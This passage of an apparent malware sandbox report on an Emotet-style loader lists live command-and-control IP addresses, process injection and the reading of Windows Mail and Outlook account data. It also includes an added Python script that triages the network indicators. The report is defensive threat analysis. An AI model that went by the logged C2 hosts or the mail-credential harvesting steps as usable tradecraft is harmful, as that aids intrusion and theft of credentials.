Get Time | type = Ticks, time = 250927 | True | 24 | Fn
Get Time | type = Ticks, time = 250943 | True | 88 | Fn
Get Time | type = Ticks, time = 250958 | True | 113 | Fn
Get Time | type = Ticks, time = 250974 | True | 29 | Fn
Get Time | type = Ticks, time = 251208 | True | 1 | Fn
Get Time | type = Ticks, time = 251473 | True | 1 | Fn
Get Time | type = Ticks, time = 258322 | True | 61 | Fn
Get Time | type = Ticks, time = 258337 | True | 17 | Fn
Get Time | type = Ticks, time = 260662 | True | 1 | Fn
Get Time | type = Ticks, time = 260849 | True | 5 | Fn
Get Time | type = Ticks, time = 260864 | True | 13 | Fn
Get Time | type = Ticks, time = 260880 | True | 15 | Fn
Get Time | type = Ticks, time = 260896 | True | 14 | Fn
Get Time | type = Ticks, time = 260911 | True | 6 | Fn
Get Time | type = Ticks, time = 260927 | True | 50 | Fn
Get Time | type = Ticks, time = 260942 | True | 35 | Fn
Get Time | type = Ticks, time = 260958 | True | 4 | Fn
Get Time | type = Ticks, time = 261379 | True | 80 | Fn
Get Info | type = Operating System | True | 48 | Fn
Get Info | type = Windows Directory, result_out = C:\Windows | True | 1 | Fn
Get Info | type = Hardware Information | True | 3 | Fn
Get Info | type = Operating System | False | 2 | Fn
Mutex (5)
Operation | Additional Information | Success | Count | Logfile
Create | mutex_name = PEMB64 | True | 1 | Fn
Create | mutex_name = Global\I78B0A7D7 | True | 1 | Fn
Create | mutex_name = Global\M78B0A7D7 | True | 1 | Fn
Create | mutex_name = Global\Nx357ECDE7 | True | 1 | Fn
Release | mutex_name = Global\I78B0A7D7 | True | 1 | Fn
The Global\I... and Global\M... pair sharing one 8-digit hex suffix, together with a PEM-prefixed name, is the mutex scheme reported for Emotet loaders of this period. The suffix varies from host to host, so a detection should key on the prefix pattern rather than on these exact names.
Environment (1)
Operation | Additional Information | Success | Count | Logfile
Get Environment String | - | True | 1 | Fn, Data
Network Behavior
HTTP Sessions (7)
Information | Value
Total Data Sent | 1.62 KB
Total Data Received | 1.12 MB
Contacted Host Count | 4
Contacted Hosts | 197.245.46.11, 216.46.44.93, 94.70.244.227, 190.213.248.219
The two totals reconcile with the per-session figures below: 333 + 331 + 0 + 0 + 331 + 333 + 331 = 1659 bytes sent (1.62 KB) and 0 + 898620 + 0 + 0 + 280396 + 0 + 156 = 1179172 bytes received (1.12 MB), almost all of it the two POST responses from 216.46.44.93. All sessions go to bare IPv4 literals on port 80 with the same fixed Internet Explorer 7 user-agent string, so there is no DNS or TLS artefact to pivot on; the IP:port pairs and that user agent coming from a non-browser process are the usable indicators.
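As an added example (not part of the VMRay report), the Python below turns the seven sessions listed in this section into a small triage: it reconciles the per-session byte counts with the summary totals in the report's own units, labels each session, and derives the hosts that answered a POST-to-IP with a payload-sized body. The session tuples are transcribed by hand from the session tables; the tag names and the 64 KiB threshold are this example's own convention.

```python
"""Triage the HTTP sessions of a sandbox report into blockable indicators.

Added example, not part of the VMRay report. SESSIONS is transcribed from
HTTP Session #1 to #7 of this report: verb and path from the Open HTTP
Request row, whether Send HTTP Request succeeded (None where the report
shows no such row), byte counts from the session header. Tag names and the
64 KiB "payload-sized" threshold are this example's own convention.
"""
import ipaddress

# (session, verb, host, port, path, send ok, bytes sent, bytes received)
SESSIONS = [
    (1, "POST", "197.245.46.11", 80, None, False, 333, 0),
    (2, "POST", "216.46.44.93", 80, None, True, 331, 898620),
    (3, "GET", "94.70.244.227", 80, "/whoami.php", False, 0, 0),
    (4, None, "190.213.248.219", 80, None, None, 0, 0),
    (5, "POST", "216.46.44.93", 80, None, True, 331, 280396),
    (6, "POST", "94.70.244.227", 80, None, False, 333, 0),
    (7, "POST", "216.46.44.93", 80, None, None, 331, 156),
]
PAYLOAD_BYTES = 64 * 1024  # example threshold for a module/payload download


def is_ip_literal(host):
    """True when the C2 is addressed by IP, so no DNS artefact exists."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def label(session):
    n, verb, host, port, path, ok, sent, recv = session
    tags = set()
    if verb is None:
        tags.add("no_request_sent")
    if verb == "POST" and is_ip_literal(host):
        tags.add("post_to_ip_literal")
    if verb == "GET" and path:
        tags.add("get_resource")
    if ok is False:
        tags.add("failed")
    if recv >= PAYLOAD_BYTES:
        tags.add("large_response")
    return {"session": n, "host": f"{host}:{port}", "path": path, "tags": tags}


def reconcile(sessions):
    """Per-session totals, to check against the summary's 'Total Data' lines."""
    return sum(s[6] for s in sessions), sum(s[7] for s in sessions)


def fmt(nbytes):
    """Mirror the report's units: KB below 1 MiB, MB from 1 MiB, two decimals."""
    if nbytes < 1024 * 1024:
        return f"{nbytes / 1024:.2f} KB"
    return f"{nbytes / (1024 * 1024):.2f} MB"


def contacted_hosts(sessions):
    seen = []
    for s in sessions:
        if s[2] not in seen:
            seen.append(s[2])
    return seen


def c2_candidates(sessions):
    """Hosts that answered a POST-to-IP with a payload-sized body."""
    hosts = []
    for s in sessions:
        if {"post_to_ip_literal", "large_response"} <= label(s)["tags"] and s[2] not in hosts:
            hosts.append(s[2])
    return hosts


if __name__ == "__main__":
    sent, recv = reconcile(SESSIONS)
    print("sent", fmt(sent), "received", fmt(recv))
    for s in SESSIONS:
        lab = label(s)
        print(lab["session"], lab["host"], sorted(lab["tags"]))
    print("c2 candidates:", c2_candidates(SESSIONS))
```

The reconciliation is the point of `fmt`: a summary that does not add up to the per-session rows usually means a session was truncated by the analysis timeout, which is worth knowing before the totals go into a report.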
HTTP Session #1
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 197.245.46.11
Server Port 80
Data Sent 333
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 197.245.46.11, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 197.245.46.11 False 1
Fn
Close Session - True 2
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 216.46.44.93
Server Port 80
Data Sent 331
Data Received 898620
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 898612, size_out = 898612 True 1
Fn
Data
Close Session - True 2
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 94.70.244.227
Server Port 80
Data Sent 0
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = 94.70.244.227, server_port = 80 False 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD False 1
Fn
HTTP Session #4
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 190.213.248.219
Server Port 80
Data Sent 0
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
HTTP Session #5
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 216.46.44.93
Server Port 80
Data Sent 331
Data Received 280396
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Read Response size = 280388, size_out = 280388 True 1
HTTP Session #6
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 94.70.244.227
Server Port 80
Data Sent 333
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 94.70.244.227, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 94.70.244.227 False 1
HTTP Session #7
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 216.46.44.93
Server Port 80
Data Sent 331
Data Received 156
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Read Response size = 148, size_out = 148 True 1
Process #8: syncpack.exe
Information Value
ID #8
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x4f4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x480, 0x12C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False -
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001c40000 0x01c40000 0x01d3ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01d40000 0x0200efff Memory Mapped File Readable False False False -
private_0x0000000002010000 0x02010000 0x0210ffff Private Memory Readable, Writable True False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x400000, size = 114688 True 1
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efde008, size = 4 True 1
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efdf010, size = 4 True 1
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 os_tid = 0x480, address = 0x0 True 1
Host Behavior
File (40)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini type = file_attributes False 1
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Get Info C:\Program Files (x86)\Mozilla Thunderbird type = file_attributes False 1
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount type = size True 1
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount type = size True 1
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount type = size True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount size = 1506, size_out = 1506 True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount size = 670, size_out = 670 True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount size = 1734, size_out = 1734 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 6 True 2
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 1 True 12
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 30 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 15 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 4 True 3
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 0 True 4
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 2 True 2
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 7 True 1
Registry (100)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird - False 1
Open Key HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts - False 1
Open Key HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Open Key HKEY_CURRENT_USER\Identities - True 1
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} - True 1
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts - False 1
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles - False 1
